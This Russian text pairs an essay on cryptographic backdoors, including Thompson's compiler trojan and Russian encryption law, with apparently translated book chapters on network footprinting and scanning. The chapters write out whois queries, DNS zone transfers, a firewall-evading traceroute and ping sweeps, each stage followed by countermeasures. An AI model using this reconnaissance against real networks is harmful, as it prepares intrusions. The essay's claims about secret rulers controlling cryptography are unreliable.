Причины появления потайных ходов в криптографических системах довольно очевидны: их разработчики хотят иметь контроль над шифруемой в этих системах информацией и оставляют для себя возможность расшифровывать ее, не зная ключа пользователя. Средство, с помощью которых данная возможность реализуется на практике, и принято именовать потайным ходом. Иногда потайные ходы применяются для целей отладки, а после ее завершения разработчики в спешке просто забывают убрать их из конечного продукта.
Классический пример потайного хода, который хакерами единодушно признается самым талантливым "хаком" по взлому системы парольной зашиты всех времен и народов, привел Кен Томпсон (один из авторов компилятора для языка программирования С) в своей лекции по случаю вручения ему престижной премии Тьюринга. Дело в том, что в операционной системе UNIX пользовательские пароли хранятся в зашифрованном виде в специальной базе данных. В компилятор языка С Томпсоном был предусмотрительно вставлен код, распознававший, когда на вход компилятора поступала программа, содержавшая приглашение пользователю зарегистрироваться (login). Тогда компилятор добавлял в эту программу код, который распознавал пароль, выбранный самим Томпсоном. Таким образом, Томпсон получал возможность успешно проходить процедуру регистрации и идентификации, не зная легальных паролей, хранимых в зашифрованной базе данных.
Стандартный способ закрыть такой потайной ход состоит в том, чтобы удалить из исходного текста компилятора "вредный" код, а затем его перекомпилировать. Но при перекомпиляции опять не обойтись без компилятора. И Томпсон дописал свой компилятор так, чтобы тот распознавал, когда на его вход поступала исправленная версия его самого. В этом случае компилятор добавлял в нее код, который, в свою очередь, при компиляции программ с приглашением login дописывал в них код, дающий Томпсону привилегированный доступ, а также код, который позволял компилятору распознавать свою обновленную версию при перекомпиляции. Таким образом, не имеет значения, насколько надежным был криптографический алгоритм, который использовался для шифрования паролей пользователей операционной системы UNIX. Потайной ход, придуманный Томпсоном. оставался открыт для него при любых условиях.
Шифрование вокруг нас
Итак, для того чтобы создать надежную криптографическую систему, необходимо обладать достаточными познаниями в области современной криптографии, аккуратно и безошибочно воплотить эти познания в виде работающей программы с дружественным интерфейсом, убрав из нее все потайные ходы по окончании отладки. Далее требуется передать эту систем) в ФАПСИ, чтобы получить там лицензию, дающую право на ее легальное распространение и использование на территории России. Однако несмотря на богатый научный потенциал российских криптографов и высокую квалификацию отечественных программистов, единственным лицензированным ФАПСИ шифром в настоящее время является ГОСТ 28147-89, разработанный еще в недрах КГБ. Все остальные криптосистемы, предлагаемые зарубежными и российскими фирмами в виде законченных продуктов или библиотек, включая как устоявшие зарубежные стандарты, так и самостоятельные оригинальные разработки, являются незаконными.
Поскольку наше государство оказывается не в состоянии обеспечить всех своих граждан, остро нуждающихся в надежной информационной защите, сертифицированными криптографическими средствами, виртуальная среда обитания российского компьютерного пользователя буквально нашпигована шифровальными программами (сотни таких программ можно найти в Internet, например, по адресу ftp.elf.stuba.sk/pub/security). Их распространению способствует нечеткость президентского Указа № 334, в котором не оговорено, что же конкретно понимается под термином "шифрование" данных. Если предположить, что шифрование — это такая нестандартная кодировка данных, которая серьезно затрудняет возможность их перекодировки в стандартное представление без соответствующего аппаратного или программного обеспечения, то в категорию шифрсистем тут же попадут архиваторы (pkzip, arj и r а r ), известные текстовые редакторы (Word и Lexicon), a также средства редактирования графических изображений (Paint и CorelDraw), поскольку все они используют свою собственную нестандартную кодировку, не позволяющую без соответствующих программ просматривать закодированные с их помощью данные.
Попытка придумать универсальный критерий подразделения кодировок на стандартные и нестандартные заранее обречена на провал, т. к. разработчиков программного обеспечения нельзя заставить пользоваться только кодировкой, одобренной указом президента в качестве стандартной. Поэтому лучше к системам шифрования относить, например, программные средства, к которым прилагается документация с явным указанием того факта, что они предназначены именно для шифрования данных.
Учитывая неразбериху, царящую в российском законодательстве, неудивительно, что российские пользователи для защиты своей конфиденциально!! информации активно применяют архиваторы с парольной защитой, Norton Diskreet, Word, Excel, многочисленные условно-бесплатные программы (PGP, CodeDvag, SecurPC, Secur-all 32, BestCrypt NP, Kremlin и др.). криптографические системы отечественных фирм ("Лан Крипто". "Анкорт" и др.), собственные кустарные разработки, а также программы неизвестного происхождения. Большинство из них крайне слабы, и программы их взлома за вполне умеренную плату можно получить, например, в Internet по адресу www.accessdata.com. Исключение в списке заведомо ненадежных криптографических систем, потенциально доступных пользователю в России, составляют лишь несколько оригинальных разработок российских фирм. Однако ввиду воздвигнутой нашим государством информационной блокады вокруг криптографии и всего, что с ней связано, можно только строить предположения, какие именно.
Подводя итог сказанному, можно сделать вывод о том, что ситуация па рынке криптографических систем не внушает оптимизма. Законодательные ограничения, ошибки в реализации, недружественный интерфейс, недостаточная длина ключа и наличие потайных ходов приводят к тому, что отыскать надежную криптосистему практически невозможно.
Поскольку криптография призвана обслуживать потребности человечества в довольно деликатной сфере (с помощью криптографических методов сохраняется в тайне конфиденциальная информация, не подлежащая, по мнению ее владельцев, бесконтрольному распространению), некоторые исследователи усматривают в сложившейся ситуации действие определенных тайных сил, которые пытаются направлять и контролировать прогресс человечества в области криптографии. Одна из главных забот этих тайных сил — взять каждого "под колпак", т. е. иметь наиболее полное досье на любого человека. Поэтому тайные общества так заинтересованы в единоличном владении элитарными криптографическими знаниями и созданными на основе этих знаний надежными средствами криптографической защиты данных, бесконтрольное распространение которых может поставить под угрозу их способность ведения тотальной слежки. Безрезультатно заканчиваются многообещающие криптографические исследования, при загадочных обстоятельствах обрываются жизни талантливых криптографов, возникают всевозможные препоны на пути свободного обмена информацией о последних криптографических изысканиях.
Другие исследователи закулисных пружин истории идут еще дальше и утверждают, что именно наиболее полные и достоверные знания из области криптологии (науки, объединяющей криптографию и криптоанализ), позволили нынешним тайным властителям, распоряжающимся судьбой человечества, достичь вершин своего могущества. Гипотеза этих исследователей состоит в том, что криптология является одним из эффективных инструментов познания окружающего мира: информация о главных направлениях его развития в зашифрованном виде доступна каждому и ее можно извлечь путем дешифрования. Кто знает, как это делается, обладает почти неограниченной властью над миром, поскольку может с большой достоверностью предсказывать будущее.
Объединены ли тайные верховные правители в единую организацию? Врядли. Скорее всего, между их различными сообществами существует серьезная конкуренция. Да и могущество их простирается до определенных пределов.
Поэтому время от времени вполне вероятно появление надежных криптосистем, хотя бы на ограниченный период времени.
Проверить эти гипотезы на практике представляется невозможным, и некоторым они могут показаться слишком смелыми, но иметь о них представление совершенно необходимо. Хотя бы для того, чтобы в случае приобретения вами заведомо ненадежной криптосистемы для нужд вашей фирмы или организации оправдать свою оплошность перед руководством вмешательством неких тайных всемогущих сил.
Введение |
Глава 1. ПРЕДВАРИТЕЛЬНЫЙ СБОР ДАННЫХ
|
Предварительный сбор данных Прежде чем приступить к столь увлекательному занятию, как хакинг, необходимо выполнить рад подготовительных мероприятий. В этой главе рассматривается первый этап подготовки, заключающийся в предварительном сборе данных (footpnntmg) о представляющей интерес сети. Именно так и поступают настоящие преступники, решившие ограбить банк. Они не вваливаются в операционный зал и не начинают требовать денег (за исключением разве что самых примитивных грабителей). Любая по-настоящему опасная группировка, замышляющая ограбление посвятит немало времени сбору информации об этом банке. Они изучат маршруты передвижения бронеавтомобилей, время доставки наличных денег, места расположения видеокамер и служебных выходов, а также все, что может им пригодиться для реализации их преступных замыслов. |
Что такое предварительный сбор данных В результате систематизированного сбора информации хакеры могут получить в свое распоряжение полный профиль системы защиты организации. Начав "с нуля" (например, имея лишь общие сведения о подключении к Internet) и применяя различные средства и технические приемы, взломщик может получить в конце концов совершенно определенный набор доменных имен, адресов подсетей и отдельных компьютеров этой организации, подключенных к Internet. Методов сбора подобной информации очень много, однако все они сводятся к одному - получению информации, имеющей отношение к технологиям Internet, корпоративным сетям (intranet), удаленному доступу (remote access) и экстрасетям (extranet). Все эти технологии, а также важные данные которые взломщики пытаются получить, перечислены в Табл. 1.1. |
Для чего необходим предварительный сбор данных Предварительный сбор данных необходим для того, чтобы систематически и методологически гарантировать получение всей информации, имеющей отношение ко всем из вышеперечисленных технологий, используемых в конкретной организации. Без четко определенной методики выполнения этой работы высока вероятность того, что какая-нибудь часть важной информации не будет получена. Предварительный cбор данных о системе безопасности организации зачастую оказывается одной из наиболее трудных задач, однако в то же время этот процесс является наиболее важным. Его успешное завершение можно обеспечить лишь при четком следовании определенной методике и его контроле. |
Сбор данных о подключении к Internet Для сбора данных о различных технологиях применяются схожие методы (это справедливо, например, по отношению к Internet и корпоративным сетям), поэтому в этой главе подробно рассматриваются лишь методы сбора необходимой информации о подключении организации к Internet. Вопросы сбора данных об удаленном доступе будут подробно рассмотрены в главе 9, "Хакинг удаленных соединений, РВХ, Voice-mail и виртуальных частных сетей". Таблица 1.1. Важная информация, которую могут определить взломщики об используемых технологиях
Строго говоря, сложно дать четкие рекомендации по выполнению процесса сбора информации, поскольку осуществить это можно по-разному. Тем не менее, в данной главе предпринята попытка описать основные этапы, которые обязательно должны быть проведены при анализе информации для создания профиля организации. Многие из описанных приемов можно с успехом применять и для сбора данных о других технологиях, упоминавшихся выше. |
Этап 1. Определение видов деятельности Прежде всего необходимо определить виды деятельности, которые будут осуществляться при сборе информации. Например, нужно ответить на вопрос, планируете ли вы собрать данные обо всей сети организации или же ограничитесь лишь определенными ее сегментами (например, сетью главного офиса)? В некоторых случаях собрать данные обо всей организации может оказаться затруднительным. К счастью, в Internet можно найти множество ресурсов, с помощью которых можно сузить область деятельности, а также получить открытую информацию об организации и ее служащих. Поиск по открытым источникам Прежде всего начните с Web-страницы организации (если, конечно, она существует). Зачастую оказывается, что на таких Web-страницах присутствует информация, которая может помочь взломщику. Однажды нам даже довелось увидеть на одном Web-узле конфигурационные параметры, которые использовались для настройки системы защиты этой организации с помощью брандмауэра. К другим данным, которые можно получить и которые могут представлять интерес, относятся следующие.
Кроме того, попробуйте просмотреть комментарии, содержащиеся в HTML-коде Web-страниц. Зачастую в коде HTML можно найти интересные, с точки зрения взломщика, комментарии, такие как "<", "!" и "--", которые не отображаются на экране при открытии страницы в окне броузера. Просмотр исходного кода Web-страницы в автономном режиме позволит гораздо эффективнее работать в интерактивном режиме. Так что зачастую полезно сохранить полный образ всего Web-узла для дальнейшего просмотра. Впоследствии эту локальную копию можно использовать для поиска комментариев или других важных данных программным способом и, таким образом, значительно повысить эффективность процесса сбора информации. Для создания образа всего Web-узла в системе UNIX можно воспользоваться утилитой Wget (ftp://gnjilux.cc.fer.hr/pub/unix/util/wget/), а в системе Windows — утилитой Teleport Pro (http://www.tenmax.com/teleport/home.htm).
Наконец, можно просто воспользоваться средствами расширенного поиска некоторых ведущих поисковых серверов, таких как AltaVista или Hotbot. Многие из них позволяют найти все Web-страницы, на которых имеются ссылки на домен интересующей вас организации. На первых взгляд эта возможность не представляет собой ничего интересного, но не торопитесь с выводами! Допустим, кто-то из сотрудников организации решил создать собственный Web-узел дома или во внутренней сети организации. Весьма вероятно, что такой Web-узел будет иметь недостаточный уровень защиты или, более того, он может быть создан без ведома руководства. Как показано на рис. 1.1, обнаружить такой Web-узел можно именно с помощью описанного метода. Поиск в базе данных EDGAR Для поиска информации о компании, представляющей собой открытое акционерное общество (publicly traded company), можно воспользоваться базой данных EDGAR, поддерживаемой Комиссией по безопасности и обмену данными (SEC — Securities and Exchange Commission), находящейся по адресу http: //www. sec. gov (рис. 1.3).
Одной из самых больших проблем, с которыми сталкиваются крупные компании, — это управление соединениями с Internet, особенно если они вовлечены в активную деятельность по приобретению других компаний или сами являются объектами приобретения. Именно поэтому так важно обращать внимание на информацию о недавно приобретенных компаниях. Среди документов комиссии SEC можно отметить два особенно важных: 10-Q и 10-К. Документ 10-Q представляет собой краткую сводку о деятельности организации за последний квартал. Кроме всей остальной информации в этом отчете также указывается количество акций компаний, приобретенных организацией за отчетный период, или количество акций организации, приобретенных за этот же период другими компаниями. Отчет 10-К содержит аналогичную информацию, однако он обновляется один раз в год. Поэтому сведения, приведенные в нем, могут потерять актуальность. Можно, например, поискать в этих документах слова subsidiary (дочерняя) или subsequent events (последующие события). В результате вы можете получить представление о недавно приобретенных компаниях или планирующихся слияниях. Зачастую организации подключают сети приобретенных ими компаний, забывая о требованиях безопасности. Поэтому вероятность того, что вы сможете проникнуть в сеть родительской компании, прорвав защиту новоприобретенного подразделения, довольно высока. Это лишний раз доказывает, что взломщики являются приверженцами хаоса и анархии, поскольку они всегда не преминут воспользоваться неразберихой, царящей в организации во время объединении сетей. Контрмеры: обеспечение безопасности общедоступных баз данных Большая часть приведенных выше сведений должна быть общедоступной. Особенно это касается открытых акционерных обществ. Однако в то же время очень важно оценить и классифицировать типы такой информации. Для выполнения такого анализа может оказаться полезным руководство по обеспечению безопасности узла (Site Security Handbook, документ RFC2196). Его можно найти по адресу http://ietf.org/rfc/rfc2196.txt. И наконец, если на Web-страницах вашего узла имеется хоть какая-нибудь информация, которая может помочь взломщику в проникновении в вашу сеть, удалите ее, если только это не является жизненно необходимым. |
Этап 2. Инвентаризация сети Первым шагом в процессе инвентаризации сети (network enumeration) является идентификация имен доменов и сетей, связанных с конкретной организацией. Доменные имена представляют собой адрес компании в Internet и являются Internet-эквивалентами названия компании, например AAAApainting.com или moetavern.com. Таблица 1. 2. Источнйки информации и методы поиска с помощью команды whois
Таблица 1.3. Базы данных, содержащие сведения о военных, правительственных и международных доменах
Регистрационный запрос С появлением совместно используемой системы регистрации (т.е. нескольких компаний-регистраторов) для получения списка доменов и соответствующей регистрационной информации, связанной с данной организацией, необходимо обратиться к серверу whois.crsnic.net. Следует определить компанию-регистратор и, таким образом, базу данных, к которой можно будет обращаться с последующими запросами на получение более подробных данных. В данном случае в качестве целевой будет использоваться компания Acme Networks, а запрос будет выполняться из командной оболочки системы UNIX (Red Hat 6.2). В используемой версии команды whois с помощью параметра @ можно задать альтернативную базу данных. В некоторых системах из ряда BSD (например, OpenBSD или FreeBSD) для этого можно воспользоваться параметром -а. Для получения более подробной информации об использовании клиента whois для генерации запросов воспользуйтесь командой man whois. [bash]$ whois "acme."@whois.crsnic.net Если о домене acme. net необходимо получить дополнительную информацию, то поиск можно продолжить и определить компанию-регистратор. [bash]$ whois "acme.net"@whois.crsnic.net Из полученных результатов видно, что для данной организации компанией-регистратором является Network Solutions, что является достаточно обычным для любой организации, зарегистрированной до ввода в действия новой системы регистрации. В дальнейшем последующие запросы должны быть адресованы соответствующей компании-регистратору, поскольку именно на ее сервере содержится требуемая информация. Организационный запрос После идентификации компании-регистратора можно приступать к формированию организационного запроса. Такой тип запроса позволяет выполнить поиск компании-регистратора для всех экземпляров имен рассматриваемой организации. Он гораздо шире, чем просто поиск имени домена. Организационный запрос должен содержать ключевое слово name и быть отправлен компании Network Solutions. [bash]$ whois " Из полученного списка видно, что к компании Acme Networks имеет отношение много доменов. Однако пока неясно, представляют ли они реальные сети или же зарегистрированы для будущего использования либо для зашиты торговых марок. Для получения ответов на эти вопросы необходимо продолжить исследования, пока не будут обнаружены реальные сети. Доменный запрос Проанализировав результаты организационного запроса, приходим к выводу, что наиболее вероятным кандидатом для изучения является домен Acme.net, поскольку он представляет саму компанию Acme Networks (естественно, все реальные имена и адреса были изменены). [bash]$ whois acme.net@whois.networksolutions.com Подобный запрос позволяет получить следующую информацию.
Теперь пришло время проявить способности детектива. Для того чтобы проанализировать полученную информацию и извлечь из нее что-то полезное, необходимо иметь определенные знания. Обычно мы называем такого рода информацию "нюансами", поскольку она уточняет имеющиеся в распоряжении взломщика сведения и позволяет осуществить более сфокусированную атаку. Давайте подробнее рассмотрим приведенные в примере данные. С помощью директивы server, примененной к записи HST, информация о которой получена из запроса whois, можно установить другие домены, обслуживаемые заданным DNS-сервером. Для этого необходимо выполнить следующие действия. Сетевой запрос Для идентификации сетей, ассоциированных с конкретным доменом, может использоваться база данных ARIN (American Registry for Internet Numbers). В ней содержатся конкретные диапазоны адресов, которыми обладает данная организация. Сгенерировать такой запрос очень важно, поскольку он позволит определить, действительно ли конкретный адрес принадлежит заданной организации, а не относится к другой организации, например провайдеру услуг Internet. [bash]$ whois "Acme Net."@whois.arin.net С использованием определенного адреса (10.10.10.0) можно сформировать более специализированный запрос. [bash]$ whois 10.10.10.08whois.arin.net База данных ARIN предоставляет удобный Web-ориентированный механизм обработки запросов, показанный на рис. 1.4. Возвращаясь к полученным результатам, можно заключить, что сеть интересующей нас компании Acme Networks адресуется главным провайдером Major IPS USA как сеть класса А (полное изложение основ протокола TCP/IP можно найти в книге Ричарда Стивенса (Richard Stevens) TCP/IP Illustrated, Volume 1). Таким образом, можно заключить, что эта сеть и является внутренней сетью компании Acme Networks.
Контактный запрос Поскольку технический служащий, чьи данные указаны в регистрационных данных, может заниматься администрированием нескольких организаций, имеет смысл обратиться к базе whois с контактным запросом по пользовательскому дескриптору базы данных. В данном случае воспользуемся дескриптором WB9201, полученным в предыдущем доменном запросе. Таким образом можно выявить домен, о существовании которого вы даже не подозреваете. [bash]$ whois "HANDLE WB9201"@whois.networksolutions.com Можно также попробовать поискать записи, содержащие часть адреса @Acme.net, и получить список всех адресов электронной почты данного домена. Для краткости мы приведем лишь часть полученных данных. [bash]$ whois "@Acme.net"@whois.internic.net
Контрмеры: обеспечение безопасности общедоступных баз данных Большая часть информации, хранящейся в описанных базах данных, открыта для свободного доступа. Когда организация намеревается зарегистрировать собственный домен, она обязана предоставить контактную информацию, сведения о выделенных ей блоке сетевых адресов и серверах DNS. Однако для того чтобы усложнить задачу взломщикам, необходимо придерживаться определенных принципов обеспечения безопасности. |
Этап 3. Прослушивание серверов DNS После установления всех доменов можно приступать к работе с серверами DNS. DNS — это распределенная база данных, предназначенная для преобразования IP-адресов в имена узлов и наоборот. Если сервер DNS не настроен на обеспечение максимальной степени защиты, то с его помощью можно получить информацию о внутренней сети организации. Перенос зоны Одна из самых серьезных ошибок администратора при настройке параметров сети состоит в предоставлении возможности взломщику осуществить перенос зоны DNS. [bash]$ nslookup Первая введенная команда — это запуск утилиты nslookup в интерактивном режиме. После запуска утилита сообщает, какой сервер им,ен в данный момент используется по умолчанию. Обычно таким сервером является DNS-сервер вашей организации или DNS-сервер провайдера. Поскольку используемый в данном примере DNS-сервер (10.10.20.2) не обслуживает интересующий нас домен, нам нужно перейти на другой сервер, на котором мы сможем найти необходимую информацию о внутренней сети. Таким образом, утилите nslookup необходимо явно сообщить о том, к какому серверу DNS ей нужно обратиться. В нашем примере мы будем использовать основной сервер сети Acme Networks с адресом 10.10.10.2. Вспомните, что его адрес мы узнали из регистрационной базы данных доменов на предыдущем этапе. Затем мы устанавливаем тип записи any, что означает, что в список выбранных записей будут отобраны все записи из базы данных DNS-сервера. (Подробнее о параметрах утилиты nslookup можно узнать с помощью команды man nslookup (UNIX) или nslookup ? (NT).) [bash]$ more zone_out Мы не будем рассматривать подробно каждый элемент всех найденных записей, а остановимся лишь на некоторых важных типах информации, которую можно получить таким образом. Как видно из приведенного выше листинга, для каждого узла имеется запись типа 'А, содержащая IP-адрес узла, имя которого указано в левом столбце. Кроме того, каждый узел имеет запись типа HINFO, идентифицирующую используемую платформу или операционную систему (описание см. в RFC 952). Информация записей HINFO не используется операционными системами, однако очень часто оказывается полезной для взломщиков. Поскольку результаты переноса зоны сохранены в файле, то его содержимое без особых проблем можно отсортировать с помощью таких программ UNIX, как grep, sed, awk или perl. [bash]$ grep -i Solaris zone_out |wc -1 388 Таким образом, взломщик имеет 388 записей, в которых присутствует слово Solaris, и каждый из этих 388 компьютеров может стать потенциальной жертвой. [bash]$ grep -i test /tmp/zone_out |wc -1 96 Итак, в нашем распоряжении около сотни записей файла зоны, в которых содержится слово test. Как правило, это количество примерно соответствует количеству реальных тестовых систем сети. Приведенные примеры — лишь малая часть того, что можно при известной доле настойчивости и изобретательности получить из файла зоны. Опытный взломщик, "просеяв через сито" полученные данные, рано или поздно выявит самый уязвимый компьютер сети, с которого он сможет начать вторжение. >>host -l acme.net |cut -f 4 -d" " » /tmp/ip_out В процессе предварительного сбора данных использовать команды системы UNIX для выполнения всех задач нет необходимости. Существует довольно много продуктов для Windows, которые позволяют получить ту же информацию (рис 1.5). [bash]$ axfr Acme.net Для того чтобы обратиться с запросом к полученной с помощью утилиты axf r базе данных, необходимо ввести следующую команду. [bash]$ axfrcat Acme.net Получение записей обмена почтой (MX) Определение компьютера, на котором обрабатывается почта,— это один из наиболее удачных способов выявления сетевого брандмауэра представляющей интерес организации. Как правило, в коммерческих компаниях почта обрабатывается на том же компьютере, который служит в качестве брандмауэра, или по крайней мере на компьютере, который находится в том же сегменте сети. Для получения более подробной информации можно воспользоваться командой host. [bash]$ host Acme.net
Если команда host применяется без параметров либо только с именем домена, то сначала она попытается найти записи А, а затем записи MX. Приведенная выше информация пересекается с той информацией, которую ранее была получена при поиске в базе данных ARIN с использованием утилиты whois. Это лишний раз подтверждает, что мы правильно определили адрес нужной нам сети. Контрмеры: обеспечение безопасности базы данных DNS Информация DNS представляет для хакера очень большой интерес, поэтому очень важно уменьшить объем данных, доступных через Internet. С точки зрения настройки узла, необходимо ограничить возможность переноса зоны, разрешив ее лишь определенным серверам. В современных версиях службы BIND для этих целей можно использовать директиву xfernets файла named.boot. Для того чтобы ограничить возможность переноса зоны службы DNS компании Microsoft, необходимо использовать параметр Notify (более подробную информацию по этому вопросу можно найти по адресу http://support.-microsoft.eom/support/kb/articles/ql93/8/37.asp). Для настройки служб имен других разработчиков необходимо обратиться к соответствующей документации. |
Этап 4. Зондирование сети Установив возможные сетевые адреса, можно попытаться определить топологию сети, а также возможные пути проникновения в нее. Отслеживание маршрутов Эта задача может быть выполнена с помощью утилиты traceroute (ftp://ftp.ee. lbl.gov/traceroute.tar.Z), которая входит в комплект поставки практически всех версий UNIX и Windows NT. В системе Windows NT название утилиты адаптировано к формату 8.3 — tracert. [bash]$ traceroute Acme.net На основании полученной информации можно проследить путь, по которому пакеты, прошедшие через маршрутизатор (шлюз), проследовали, миновав три узла (2—4), к точке назначения. На всем пути следования пакеты нигде не были заблокированы. На основании ранее полученной информации известно, что МХ-запись домена Acme. net указывает на узел gate.acme.net. Следовательно, можно предположить, что этот узел является не логическим устройством, а реальным компьютером сети, а сегмент, через который пакет прошел на предыдущем шаге (4), — это пограничный маршрутизатор организации. Сегмент 4 может быть реализован как в виде выделенного программного брандмауэра, так и в виде простого фильтрующего маршрутизатора. На данном этапе об этом пока трудно судить. Как правило, именно на устройство, находящееся на сегменте, непосредственно за которым находится реальный компьютер сети, возлагается задача маршрутизации (например, маршрутизатор или брандмауэр). [bash]$ traceroute 10.10.10.2 Из листинга видно, что попытка использования утилиты traceroute, которая по умолчанию отсылает пакеты UDP, была заблокирована брандмауэром. [bash]$ traceroute -S -p53 10.10.10.2 Поскольку теперь пакеты не вызывают подозрения у устройства управления доступом (сегмент 4), они без проблем его преодолевают. Таким образом, мы можем зондировать узлы, находящиеся за устройством управления доступом, просто отправляя запросы по протоколу UPD в порт 53. Кроме того, если вы будете зондировать систему, которая опрашивает порт 53 на предмет поступления сообщений по протоколу UDP, вы не получите обычного сообщения ICMP о том, что данная система недоступна. Таким образом, если вы не увидели информации об узле, это означает, что пакеты дошли до цели. Существуют специальные приемы, позволяющие уточнить данные о списке ACL, используемом для конкретного устройства управления доступом. Одним из таких методов является сканирование протокола брандмауэра (firewall protocol scanning), о чем пойдет речь в главе 11, "Брандмауэры". Контрмеры: как пресечь зондирование сети В данной главе мы лишь слегка затронули такую обширную тему, как методы зондирования сети. В последующих главах мы снова вернемся к ней и поговорим о более серьезных методах. Однако уже сейчас можно сформулировать некоторые соображения о том, как предотвратить рассмотренные выше попытки зондирования. Во-первых, многие коммерческие системы выявления вторжений (NIDS — Network Intrusion Detection Systems) позволяют выявлять попытки зондирования такого рода. Кроме того, подобные вторжения можно выявить с помощью бесплатной программы Марти Рош (Marty Roach) (http://www.snort.org/). Если вы хотите принять меры и защититься от зондирования сети с помощью утилиты traceroute, обратите внимание на утилиту RotoRouter, написанную Хамблом (Humble) (http://packet storm, securify .com/linux/trinux/src/rr-l.0 . tgz). Эта утилита позволяет не только регистрировать входящие от утилиты traceroute запросы, но и генерировать ложные ответы. И наконец, в зависимости от общей политики безопасности вашей организации можно настроить пограничные маршрутизаторы таким образом, чтобы ограничить поток данных по протоколам ICMP и UDP только строго определенными узлами. Такой подход позволит свести риск проникновения во внутреннюю сеть посредством зондирования к минимуму. |
Резюме Итак, в распоряжении злоумышленника имеется целый ряд приемов, с помощью которых он может зондировать сеть или собирать о ней предварительную информацию. В данной главе мы лишь слегка затронули самые распространенные и типичные из этих приемов, поскольку новые средства и инструменты появляются чуть ли не ежедневно и любые детали могут быстро устаревать. Кроме того, все основные принципы предварительного сбора информации рассматривались на упрощенных примерах. На практике специалистам, возможно, придется столкнуться гораздо с более сложной задачей, состоящей в противостоянии сбору данных о десятках или сотнях доменов и их идентификации. Именно по этой причине мы в своей работе стараемся автоматизировать выполнение как можно большего числа задач, комбинируя сценарии оболочки, программы на языке Perl и другие средства. В Internet постоянно "рыщет" множество квалифицированных и опытных взломщиков, которых еще никто и никогда не ловил за руку. Поэтому не забывайте о том, что чем меньше информации о внутренней архитектуре будет доступно в глобальной сети и чем тщательнее будет выполняться мониторинг всех событий, тем сложнее взломщику будет проникнуть в сеть. |
Глава 2. СКАНИРОВАНИЕ
|
Сканирование Если процесс предварительного сбора данных можно сравнить со скрытым наблюдением, цель которого — добыть как можно больше информации, не выдавая себя, то сканирование — это "разведка боем". Цель сканирования — выявить открытые "окна" и "двери". В предварительно собранной информации содержатся сведения об адресах подсетей и отдельных компьютеров, полученных с помощью запросов whois и переноса зоны. Информация, собранная на этом этапе, очень ценна для взломщика, поскольку содержит такие данные, как имена и фамилии сотрудников, номера телефонов, диапазоны IP-адресов, адреса DNS-серверов и почтовых серверов. Теперь можно приступать к выявлению тех компьютеров, которые подключены к сети и достижимы из Internet. Для этого будут использоваться разнообразные средства и приемы, такие как ping-прослушивание, сканирование портов и различные методы, позволяющие автоматизировать выполнение этих задач. Прослушивание сети с помощью утилиты ping Одним из основных этапов в определении структуры сети является ее автоматизированное прослушивание с помощью утилиты ping по диапазону IP-адресов или адресам подсетей. Цель такого прослушивания — определить, имеется ли у отдельных компьютеров подключение к Internet. Утилита ping отправляет пакеты ICMP ECHO (тип 8) указанному компьютеру и ожидает ответного пакета ICMP ECHO_REPLY (тип 0). Получение такого ответа говорит о том, что компьютер в данный момент подключен к Internet. Хотя при некоторой настойчивости с помощью утилиты ping можно определить количество постоянно подключенных к Internet компьютеров в небольшой и даже средней сети, ручной перебор сетевых адресов будет малоэффективен, если необходимо обследовать корпоративную сеть крупной организации. [tsunami ]'$ gping В качестве параметров утилите gping необходимо передать диапазон IP-адресов. На основании этого диапазона будет генерироваться листинг, в котором адреса перебираются друг за другом. Каждый октет передаваемого IP-адреса должен отделяться от остальных пробелами. Например, если мы собираемся генерировать IP-адреса для сети класса С, нам необходимо просто добавить 254 в качестве последнего параметра. Это позволит утилите перебрать все адреса от 192.168.1.1 до 192.168.1.254. Предположим, что эта сеть не содержит подсетей и использует маску подсети 255.255.255.0. Кроме того, мы не будем проверять адрес самой сети 192.168.1.0 и адрес широковещательной рассылки 192.168.1.255. Следует избегать применения утилиты ping к адресам широковещательной рассылки, поскольку это может привести к отказу, или так называемому состоянию DoS (denial of service), если ответный пакет одновременно будет сгенерирован многими узлами (более подробная информация о том, как установить маску подсети узла, приведена в документации по запросам ICMP). С использованием утилиты gping можно сгенерировать перечень адресов, которые затем будут использоваться утилитой fping. [tsunami] gping 192 168 1 1 254 Теперь в нашем распоряжении имеется список всех узлов, которые могут находиться в исследуемой сети класса С. Осталось лишь перенаправить вывод утилиты gping на вход утилиты fping, которая выполнит прослушивание сети и определит, какие компьютеры в данный момент подключены к сети. [tsunami]? gping 192 168 1 1 254 | fping -a Параметр -а утилиты fping предназначен для включения режима, в котором выводится информация обо всех активных в данный момент компьютерах сети. Если нужно, утилита может выводить и информацию об именах узлов. Этот режим включается с помощью параметра -d. По нашему мнению, параметр -а лучше всего использовать в сценариях оболочки, а параметр -d — при исследовании сети на предмет поиска определенных узлов. Среди других параметров необходимо упомянуть -f, который позволяет вводить адреса из заранее подготовленного файла, а также -h, с помощью которого можно получить перечень всех параметров утилиты и режимов их использования. Еще одной утилитой, о которой мы будем много говорить в этой книге, является утилита nmap, созданная хакером по имени Федор (Fyodor) (www.insecure.org/nmap). Более подробно эта утилита будет рассматриваться ниже в этой главе, однако будет нелишним упомянуть, что, кроме всех остальных возможностей, данная утилита также позволяет выполнить прослушивание сети. Для включения соответствующего режима необходимо указать параметр -SP. [tsunami] nmap -sP 192.168.1.0/24 Что касается приверженцев Windows, они также не остались без внимания. В частности, имеется такая бесплатная утилита, как Finger (рис. 2.1), написанная хакерами из группы Rhino9 (http://www.nmrc.org/files/snt/). Эта утилита является одной из самых быстрых в своем классе. Как и fping, утилита Finger одновременно рассылает несколько ICMP-пакетов ECHO, а затем ожидает поступления ответов. Кроме того, Finger позволяет также получать имена узлов и сохранять результаты своей работы в файле. Такой же скоростью, как и Finger, обладает коммерческий продукт Ping Sweep, предлагаемый компанией SolarWinds (www.solarwinds.net). Поразительная скорость работы Ping Sweep объясняется тем, что данная программа позволяет устанавливать время задержки между передаваемыми пакетами (delay time). Установив это значение равным 0 или 1, можно просканировать всю сеть класса С и получить имена ее узлов менее чем за 7 секунд. Однако при использовании этих средств соблюдайте осторожность, поскольку в этом случае можно значительно снизить пропускную способность какого-нибудь низкоскоростного канала, например канала ISDN с пропускной способностью 128 Кбит/с или Frame Relay (не говоря уже о спутниковом или инфракрасном канале).
